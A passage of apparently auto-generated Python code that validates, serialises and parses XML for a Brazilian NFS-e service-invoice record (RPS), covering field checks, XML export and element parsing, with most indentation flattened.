warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpTipoBairro' % {"value" : value.encode("utf-8")} )
def validate_tpBairro(self, value):
# Validate type tpBairro, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpBairro' % {"value" : value.encode("utf-8")} )
def validate_tpCodCidade(self, value):
# Validate type tpCodCidade, a restriction on xs:unsignedInt.
if value is not None and Validate_simpletypes_:
if value < 1:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpCodCidade' % {"value" : value} )
def validate_tpCidadeTomadorDescricao(self, value):
# Validate type tpCidadeTomadorDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 50:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeTomadorDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpCEP(self, value):
# Validate type tpCEP, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCEP_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCEP_patterns_, ))
validate_tpCEP_patterns_ = [['^[0-9]{0,8}$']]
def validate_tpEmail(self, value):
# Validate type tpEmail, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 60:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpEmail' % {"value" : value.encode("utf-8")} )
def validate_tpCodigoAtividade(self, value):
# Validate type tpCodigoAtividade, a restriction on xs:int.
if value is not None and Validate_simpletypes_:
if not self.gds_validate_simple_patterns(
self.validate_tpCodigoAtividade_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpCodigoAtividade_patterns_, ))
validate_tpCodigoAtividade_patterns_ = [['^[0-9]{9}$']]
def validate_tpAliquota(self, value):
# Validate type tpAliquota, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpAliquota' % {"value" : value} )
            if len(str(value)) >= 6:
                warnings_.warn('Value "%(value)s" does not match the xsd totalDigits (digit-length) restriction on tpAliquota' % {"value" : value} )
def validate_tpTipoRecolhimento(self, value):
# Validate type tpTipoRecolhimento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'R']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTipoRecolhimento' % {"value" : value.encode("utf-8")} )
def validate_tpCidadeDescricao(self, value):
# Validate type tpCidadeDescricao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 30:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpCidadeDescricao' % {"value" : value.encode("utf-8")} )
def validate_tpOperacao(self, value):
# Validate type tpOperacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['A', 'B', 'C', 'D', 'J']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpOperacao' % {"value" : value.encode("utf-8")} )
def validate_tpTributacao(self, value):
# Validate type tpTributacao, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
value = str(value)
enumerations = ['C', 'F', 'K', 'E', 'T', 'H', 'G', 'N', 'M']
enumeration_respectee = False
for enum in enumerations:
if value == enum:
enumeration_respectee = True
break
if not enumeration_respectee:
warnings_.warn('Value "%(value)s" does not match xsd enumeration restriction on tpTributacao' % {"value" : value.encode("utf-8")} )
def validate_tpValor(self, value):
# Validate type tpValor, a restriction on xs:decimal.
if value is not None and Validate_simpletypes_:
if value < 0:
warnings_.warn('Value "%(value)s" does not match xsd minInclusive restriction on tpValor' % {"value" : value} )
            if len(str(value)) >= 15:
                warnings_.warn('Value "%(value)s" does not match the xsd totalDigits (digit-length) restriction on tpValor' % {"value" : value} )
if not self.gds_validate_simple_patterns(
self.validate_tpValor_patterns_, value):
warnings_.warn('Value "%s" does not match xsd pattern restrictions: %s' % (value.encode('utf-8'), self.validate_tpValor_patterns_, ))
validate_tpValor_patterns_ = [['^0$|^0\\.[0-9]{2}$|^[1-9]{1}[0-9]{0,12}(\\.[0-9]{0,2})?$']]
def validate_tpDescricaoRPS(self, value):
# Validate type tpDescricaoRPS, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 1500:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpDescricaoRPS' % {"value" : value.encode("utf-8")} )
def validate_tpDDDNulo(self, value):
# Validate type tpDDDNulo, a restriction on None.
pass
def validate_tpFoneNulo(self, value):
# Validate type tpFoneNulo, a restriction on None.
pass
def validate_tpMotCancelamento(self, value):
# Validate type tpMotCancelamento, a restriction on xs:string.
if value is not None and Validate_simpletypes_:
if len(value) > 80:
warnings_.warn('Value "%(value)s" does not match xsd maxLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
if len(value) < 0:
warnings_.warn('Value "%(value)s" does not match xsd minLength restriction on tpMotCancelamento' % {"value" : value.encode("utf-8")} )
def validate_tpCPFCNPJnulo(self, value):
# Validate type tpCPFCNPJnulo, a restriction on None.
pass
def hasContent_(self):
if (
self.Assinatura is not None or
self.InscricaoMunicipalPrestador is not None or
self.RazaoSocialPrestador is not None or
self.TipoRPS is not None or
self.SerieRPS is not None or
self.NumeroRPS is not None or
self.DataEmissaoRPS is not None or
self.SituacaoRPS is not None or
self.SerieRPSSubstituido is not None or
self.NumeroRPSSubstituido is not None or
self.NumeroNFSeSubstituida is not None or
self.DataEmissaoNFSeSubstituida is not None or
self.SeriePrestacao is not None or
self.InscricaoMunicipalTomador is not None or
self.CPFCNPJTomador is not None or
self.RazaoSocialTomador is not None or
self.DocTomadorEstrangeiro is not None or
self.TipoLogradouroTomador is not None or
self.LogradouroTomador is not None or
self.NumeroEnderecoTomador is not None or
self.ComplementoEnderecoTomador is not None or
self.TipoBairroTomador is not None or
self.BairroTomador is not None or
self.CidadeTomador is not None or
self.CidadeTomadorDescricao is not None or
self.CEPTomador is not None or
self.EmailTomador is not None or
self.CodigoAtividade is not None or
self.AliquotaAtividade is not None or
self.TipoRecolhimento is not None or
self.MunicipioPrestacao is not None or
self.MunicipioPrestacaoDescricao is not None or
self.Operacao is not None or
self.Tributacao is not None or
self.ValorPIS is not None or
self.ValorCOFINS is not None or
self.ValorINSS is not None or
self.ValorIR is not None or
self.ValorCSLL is not None or
self.AliquotaPIS is not None or
self.AliquotaCOFINS is not None or
self.AliquotaINSS is not None or
self.AliquotaIR is not None or
self.AliquotaCSLL is not None or
self.DescricaoRPS is not None or
self.DDDPrestador is not None or
self.TelefonePrestador is not None or
self.DDDTomador is not None or
self.TelefoneTomador is not None or
self.MotCancelamento is not None or
self.CPFCNPJIntermediario is not None or
self.Deducoes is not None or
self.Itens is not None
):
return True
else:
return False
def export(self, outfile, level, namespace_='ns1:', name_='tpRPS', namespacedef_='', pretty_print=True):
imported_ns_def_ = GenerateDSNamespaceDefs_.get('tpRPS')
if imported_ns_def_ is not None:
namespacedef_ = imported_ns_def_
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.original_tagname_ is not None:
name_ = self.original_tagname_
showIndent(outfile, level, pretty_print)
outfile.write('<%s%s%s' % (namespace_, name_, namespacedef_ and ' ' + namespacedef_ or '', ))
already_processed = set()
self.exportAttributes(outfile, level, already_processed, namespace_, name_='tpRPS')
if self.hasContent_():
outfile.write('>%s' % (eol_, ))
self.exportChildren(outfile, level + 1, namespace_='ns1:', name_='tpRPS', pretty_print=pretty_print)
showIndent(outfile, level, pretty_print)
outfile.write('</%s%s>%s' % (namespace_, name_, eol_))
else:
outfile.write('/>%s' % (eol_, ))
def exportAttributes(self, outfile, level, already_processed, namespace_='ns1:', name_='tpRPS'):
if self.Id is not None and 'Id' not in already_processed:
already_processed.add('Id')
outfile.write(' Id=%s' % (self.gds_encode(self.gds_format_string(quote_attrib(self.Id), input_name='Id')), ))
def exportChildren(self, outfile, level, namespace_='ns1:', name_='tpRPS', fromsubclass_=False, pretty_print=True):
if pretty_print:
eol_ = '\n'
else:
eol_ = ''
if self.Assinatura is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Assinatura>%s</ns1:Assinatura>%s' % (self.gds_format_base64(self.Assinatura, input_name='Assinatura'), eol_))
if self.InscricaoMunicipalPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalPrestador>%s</ns1:InscricaoMunicipalPrestador>%s' % (self.gds_format_integer(self.InscricaoMunicipalPrestador, input_name='InscricaoMunicipalPrestador'), eol_))
if self.RazaoSocialPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialPrestador>%s</ns1:RazaoSocialPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialPrestador), input_name='RazaoSocialPrestador')), eol_))
if self.TipoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRPS>%s</ns1:TipoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRPS), input_name='TipoRPS')), eol_))
if self.SerieRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPS>%s</ns1:SerieRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPS), input_name='SerieRPS')), eol_))
if self.NumeroRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPS>%s</ns1:NumeroRPS>%s' % (self.gds_format_integer(self.NumeroRPS, input_name='NumeroRPS'), eol_))
if self.DataEmissaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoRPS>%s</ns1:DataEmissaoRPS>%s' % (self.gds_format_datetime(self.DataEmissaoRPS, input_name='DataEmissaoRPS'), eol_))
if self.SituacaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SituacaoRPS>%s</ns1:SituacaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SituacaoRPS), input_name='SituacaoRPS')), eol_))
if self.SerieRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SerieRPSSubstituido>%s</ns1:SerieRPSSubstituido>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.SerieRPSSubstituido), input_name='SerieRPSSubstituido')), eol_))
if self.NumeroRPSSubstituido is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroRPSSubstituido>%s</ns1:NumeroRPSSubstituido>%s' % (self.gds_format_integer(self.NumeroRPSSubstituido, input_name='NumeroRPSSubstituido'), eol_))
if self.NumeroNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroNFSeSubstituida>%s</ns1:NumeroNFSeSubstituida>%s' % (self.gds_format_integer(self.NumeroNFSeSubstituida, input_name='NumeroNFSeSubstituida'), eol_))
if self.DataEmissaoNFSeSubstituida is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DataEmissaoNFSeSubstituida>%s</ns1:DataEmissaoNFSeSubstituida>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DataEmissaoNFSeSubstituida), input_name='DataEmissaoNFSeSubstituida')), eol_))
if self.SeriePrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:SeriePrestacao>%s</ns1:SeriePrestacao>%s' % (self.gds_format_integer(self.SeriePrestacao, input_name='SeriePrestacao'), eol_))
if self.InscricaoMunicipalTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:InscricaoMunicipalTomador>%s</ns1:InscricaoMunicipalTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.InscricaoMunicipalTomador), input_name='InscricaoMunicipalTomador')), eol_))
if self.CPFCNPJTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJTomador>%s</ns1:CPFCNPJTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJTomador), input_name='CPFCNPJTomador')), eol_))
if self.RazaoSocialTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:RazaoSocialTomador>%s</ns1:RazaoSocialTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.RazaoSocialTomador), input_name='RazaoSocialTomador')), eol_))
if self.DocTomadorEstrangeiro is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DocTomadorEstrangeiro>%s</ns1:DocTomadorEstrangeiro>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DocTomadorEstrangeiro), input_name='DocTomadorEstrangeiro')), eol_))
if self.TipoLogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoLogradouroTomador>%s</ns1:TipoLogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoLogradouroTomador), input_name='TipoLogradouroTomador')), eol_))
if self.LogradouroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:LogradouroTomador>%s</ns1:LogradouroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.LogradouroTomador), input_name='LogradouroTomador')), eol_))
if self.NumeroEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:NumeroEnderecoTomador>%s</ns1:NumeroEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.NumeroEnderecoTomador), input_name='NumeroEnderecoTomador')), eol_))
if self.ComplementoEnderecoTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ComplementoEnderecoTomador>%s</ns1:ComplementoEnderecoTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.ComplementoEnderecoTomador), input_name='ComplementoEnderecoTomador')), eol_))
if self.TipoBairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoBairroTomador>%s</ns1:TipoBairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoBairroTomador), input_name='TipoBairroTomador')), eol_))
if self.BairroTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:BairroTomador>%s</ns1:BairroTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.BairroTomador), input_name='BairroTomador')), eol_))
if self.CidadeTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomador>%s</ns1:CidadeTomador>%s' % (self.gds_format_integer(self.CidadeTomador, input_name='CidadeTomador'), eol_))
if self.CidadeTomadorDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CidadeTomadorDescricao>%s</ns1:CidadeTomadorDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CidadeTomadorDescricao), input_name='CidadeTomadorDescricao')), eol_))
if self.CEPTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CEPTomador>%s</ns1:CEPTomador>%s' % (self.gds_format_integer(self.CEPTomador, input_name='CEPTomador'), eol_))
if self.EmailTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:EmailTomador>%s</ns1:EmailTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.EmailTomador), input_name='EmailTomador')), eol_))
if self.CodigoAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CodigoAtividade>%s</ns1:CodigoAtividade>%s' % (self.gds_format_integer(self.CodigoAtividade, input_name='CodigoAtividade'), eol_))
if self.AliquotaAtividade is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaAtividade>%s</ns1:AliquotaAtividade>%s' % (self.gds_format_float(self.AliquotaAtividade, input_name='AliquotaAtividade'), eol_))
if self.TipoRecolhimento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TipoRecolhimento>%s</ns1:TipoRecolhimento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TipoRecolhimento), input_name='TipoRecolhimento')), eol_))
if self.MunicipioPrestacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacao>%s</ns1:MunicipioPrestacao>%s' % (self.gds_format_integer(self.MunicipioPrestacao, input_name='MunicipioPrestacao'), eol_))
if self.MunicipioPrestacaoDescricao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MunicipioPrestacaoDescricao>%s</ns1:MunicipioPrestacaoDescricao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MunicipioPrestacaoDescricao), input_name='MunicipioPrestacaoDescricao')), eol_))
if self.Operacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Operacao>%s</ns1:Operacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Operacao), input_name='Operacao')), eol_))
if self.Tributacao is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:Tributacao>%s</ns1:Tributacao>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.Tributacao), input_name='Tributacao')), eol_))
if self.ValorPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorPIS>%s</ns1:ValorPIS>%s' % (self.gds_format_float(self.ValorPIS, input_name='ValorPIS'), eol_))
if self.ValorCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCOFINS>%s</ns1:ValorCOFINS>%s' % (self.gds_format_float(self.ValorCOFINS, input_name='ValorCOFINS'), eol_))
if self.ValorINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorINSS>%s</ns1:ValorINSS>%s' % (self.gds_format_float(self.ValorINSS, input_name='ValorINSS'), eol_))
if self.ValorIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorIR>%s</ns1:ValorIR>%s' % (self.gds_format_float(self.ValorIR, input_name='ValorIR'), eol_))
if self.ValorCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:ValorCSLL>%s</ns1:ValorCSLL>%s' % (self.gds_format_float(self.ValorCSLL, input_name='ValorCSLL'), eol_))
if self.AliquotaPIS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaPIS>%s</ns1:AliquotaPIS>%s' % (self.gds_format_float(self.AliquotaPIS, input_name='AliquotaPIS'), eol_))
if self.AliquotaCOFINS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCOFINS>%s</ns1:AliquotaCOFINS>%s' % (self.gds_format_float(self.AliquotaCOFINS, input_name='AliquotaCOFINS'), eol_))
if self.AliquotaINSS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaINSS>%s</ns1:AliquotaINSS>%s' % (self.gds_format_float(self.AliquotaINSS, input_name='AliquotaINSS'), eol_))
if self.AliquotaIR is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaIR>%s</ns1:AliquotaIR>%s' % (self.gds_format_float(self.AliquotaIR, input_name='AliquotaIR'), eol_))
if self.AliquotaCSLL is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:AliquotaCSLL>%s</ns1:AliquotaCSLL>%s' % (self.gds_format_float(self.AliquotaCSLL, input_name='AliquotaCSLL'), eol_))
if self.DescricaoRPS is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DescricaoRPS>%s</ns1:DescricaoRPS>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DescricaoRPS), input_name='DescricaoRPS')), eol_))
if self.DDDPrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDPrestador>%s</ns1:DDDPrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDPrestador), input_name='DDDPrestador')), eol_))
if self.TelefonePrestador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefonePrestador>%s</ns1:TelefonePrestador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefonePrestador), input_name='TelefonePrestador')), eol_))
if self.DDDTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:DDDTomador>%s</ns1:DDDTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.DDDTomador), input_name='DDDTomador')), eol_))
if self.TelefoneTomador is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:TelefoneTomador>%s</ns1:TelefoneTomador>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.TelefoneTomador), input_name='TelefoneTomador')), eol_))
if self.MotCancelamento is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:MotCancelamento>%s</ns1:MotCancelamento>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.MotCancelamento), input_name='MotCancelamento')), eol_))
if self.CPFCNPJIntermediario is not None:
showIndent(outfile, level, pretty_print)
outfile.write('<ns1:CPFCNPJIntermediario>%s</ns1:CPFCNPJIntermediario>%s' % (self.gds_encode(self.gds_format_string(quote_xml(self.CPFCNPJIntermediario), input_name='CPFCNPJIntermediario')), eol_))
if self.Deducoes is not None:
self.Deducoes.export(outfile, level, namespace_, name_='Deducoes', pretty_print=pretty_print)
if self.Itens is not None:
self.Itens.export(outfile, level, namespace_, name_='Itens', pretty_print=pretty_print)
def build(self, node):
already_processed = set()
self.buildAttributes(node, node.attrib, already_processed)
for child in node:
nodeName_ = Tag_pattern_.match(child.tag).groups()[-1]
self.buildChildren(child, node, nodeName_)
return self
def buildAttributes(self, node, attrs, already_processed):
value = find_attr_value_('Id', node)
if value is not None and 'Id' not in already_processed:
already_processed.add('Id')
self.Id = value
def buildChildren(self, child_, node, nodeName_, fromsubclass_=False):
if nodeName_ == 'Assinatura':
sval_ = child_.text
if sval_ is not None:
try:
bval_ = base64.b64decode(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires base64 encoded string: %s' % exp)
bval_ = self.gds_validate_base64(bval_, node, 'Assinatura')
else:
bval_ = None
self.Assinatura = bval_
# validate type tpAssinatura
self.validate_tpAssinatura(self.Assinatura)
elif nodeName_ == 'InscricaoMunicipalPrestador':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'InscricaoMunicipalPrestador')
self.InscricaoMunicipalPrestador = ival_
# validate type tpInscricaoMunicipal
self.validate_tpInscricaoMunicipal(self.InscricaoMunicipalPrestador)
elif nodeName_ == 'RazaoSocialPrestador':
RazaoSocialPrestador_ = child_.text
RazaoSocialPrestador_ = self.gds_validate_string(RazaoSocialPrestador_, node, 'RazaoSocialPrestador')
self.RazaoSocialPrestador = RazaoSocialPrestador_
# validate type tpRazaoSocialPrestador
self.validate_tpRazaoSocialPrestador(self.RazaoSocialPrestador)
elif nodeName_ == 'TipoRPS':
TipoRPS_ = child_.text
TipoRPS_ = self.gds_validate_string(TipoRPS_, node, 'TipoRPS')
self.TipoRPS = TipoRPS_
# validate type tpTipoRPS
self.validate_tpTipoRPS(self.TipoRPS)
elif nodeName_ == 'SerieRPS':
SerieRPS_ = child_.text
SerieRPS_ = self.gds_validate_string(SerieRPS_, node, 'SerieRPS')
self.SerieRPS = SerieRPS_
# validate type tpSerieRPS
self.validate_tpSerieRPS(self.SerieRPS)
elif nodeName_ == 'NumeroRPS':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPS')
self.NumeroRPS = ival_
# validate type tpNumero
self.validate_tpNumero(self.NumeroRPS)
elif nodeName_ == 'DataEmissaoRPS':
sval_ = child_.text
dval_ = self.gds_parse_datetime(sval_)
self.DataEmissaoRPS = dval_
elif nodeName_ == 'SituacaoRPS':
SituacaoRPS_ = child_.text
SituacaoRPS_ = self.gds_validate_string(SituacaoRPS_, node, 'SituacaoRPS')
self.SituacaoRPS = SituacaoRPS_
# validate type tpSituacaoRPS
self.validate_tpSituacaoRPS(self.SituacaoRPS)
elif nodeName_ == 'SerieRPSSubstituido':
SerieRPSSubstituido_ = child_.text
SerieRPSSubstituido_ = self.gds_validate_string(SerieRPSSubstituido_, node, 'SerieRPSSubstituido')
self.SerieRPSSubstituido = SerieRPSSubstituido_
# validate type tpSerieRPSSubstituido
self.validate_tpSerieRPSSubstituido(self.SerieRPSSubstituido)
elif nodeName_ == 'NumeroRPSSubstituido':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroRPSSubstituido')
self.NumeroRPSSubstituido = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroRPSSubstituido)
elif nodeName_ == 'NumeroNFSeSubstituida':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'NumeroNFSeSubstituida')
self.NumeroNFSeSubstituida = ival_
# validate type tpNumeroComZero
self.validate_tpNumeroComZero(self.NumeroNFSeSubstituida)
elif nodeName_ == 'DataEmissaoNFSeSubstituida':
DataEmissaoNFSeSubstituida_ = child_.text
DataEmissaoNFSeSubstituida_ = self.gds_validate_string(DataEmissaoNFSeSubstituida_, node, 'DataEmissaoNFSeSubstituida')
self.DataEmissaoNFSeSubstituida = DataEmissaoNFSeSubstituida_
# validate type tpDataNulo
self.validate_tpDataNulo(self.DataEmissaoNFSeSubstituida)
elif nodeName_ == 'SeriePrestacao':
sval_ = child_.text
try:
ival_ = int(sval_)
except (TypeError, ValueError) as exp:
raise_parse_error(child_, 'requires integer: %s' % exp)
ival_ = self.gds_validate_integer(ival_, node, 'SeriePrestacao')
self.SeriePrestacao = ival_
# validate type tpSeriePrestacao
self.validate_tpSeriePrestacao(self.SeriePrestacao)
elif nodeName_ == 'InscricaoMunicipalTomador':
InscricaoMunicipalTomador_ = child_.text
InscricaoMunicipalTomador_ = self.gds_validate_string(InscricaoMunicipalTomador_, node, 'InscricaoMunicipalTomador')
self.InscricaoMunicipalTomador = InscricaoMunicipalTomador_
# validate type tpInscricaoMunicipalNulo
self.validate_tpInscricaoMunicipalNulo(self.InscricaoMunicipalTomador)
elif nodeName_ == 'CPFCNPJTomador':
CPFCNPJTomador_ = child_.text
CPFCNPJTomador_ = self.gds_validate_string(CPFCNPJTomador_, node, 'CPFCNPJTomador')
self.CPFCNPJTomador = CPFCNPJTomador_
# validate type tpCPFCNPJ
self.validate_tpCPFCNPJ(self.CPFCNPJTomador)
elif nodeName_ == 'RazaoSocialTomador':
RazaoSocialTomador_ = child_.text
RazaoSocialTomador_ = self.gds_validate_string(RazaoSocialTomador_, node, 'RazaoSocialTomador')
self.RazaoSocialTomador = RazaoSocialTomador_
# validate type tpRazaoSocial
self.validate_tpRazaoSocial(self.RazaoSocialTomador)
elif nodeName_ == 'DocTomadorEstrangeiro':
DocTomadorEstrangeiro_ = child_.text
DocTomadorEstrangeiro_ = self.gds_validate_string(DocTomadorEstrangeiro_, node, 'DocTomadorEstrangeiro')
self.DocTomadorEstrangeiro = DocTomadorEstrangeiro_
# validate type tpDocTomadorEstrangeiro
self.validate_tpDocTomadorEstrangeiro(self.DocTomadorEstrangeiro)
elif nodeName_ == 'TipoLogradouroTomador':
TipoLogradouroTomador_ = child_.text
TipoLogradouroTomador_ = self.gds_validate_string(TipoLogradouroTomador_, node, 'TipoLogradouroTomador')
self.TipoLogradouroTomador = TipoLogradouroTomador_
# validate type tpTipoLogradouro
self.validate_tpTipoLogradouro(self.TipoLogradouroTomador)
elif nodeName_ == 'LogradouroTomador':
LogradouroTomador_ = child_.text
LogradouroTomador_ = self.gds_validate_string(LogradouroTomador_, node, 'LogradouroTomador')
self.LogradouroTomador = LogradouroTomador_
# validate type tpLogradouro
self.validate_tpLogradouro(self.LogradouroTomador)
elif nodeName_ == 'NumeroEnderecoTomador':
NumeroEnderecoTomador_ = child_.text
NumeroEnderecoTomador_ = self.gds_validate_string(NumeroEnderecoTomador_, node, 'NumeroEnderecoTomador')
self.NumeroEnderecoTomador = NumeroEnderecoTomador_
# validate type tpNumeroEndereco
self.validate_tpNumeroEndereco(self.NumeroEnderecoTomador)
elif nodeName_ == 'ComplementoEnderecoTomador':
ComplementoEnderecoTomador_ = child_.text
ComplementoEnderecoTomador_ = self.gds_validate_string(ComplementoEnderecoTomador_, node, 'ComplementoEnderecoTomador')
self.ComplementoEnderecoTomador = ComplementoEnderecoTomador_
# validate type tpComplementoEndereco
self.validate_tpComplementoEndereco(self.ComplementoEnderecoTomador)
elif nodeName_ == 'TipoBairroTomador':
TipoBairroTomador_ = child_.text
TipoBairroTomador_ = self.gds_validate_string(TipoBairroTomador_, node, 'TipoBairroTomador')
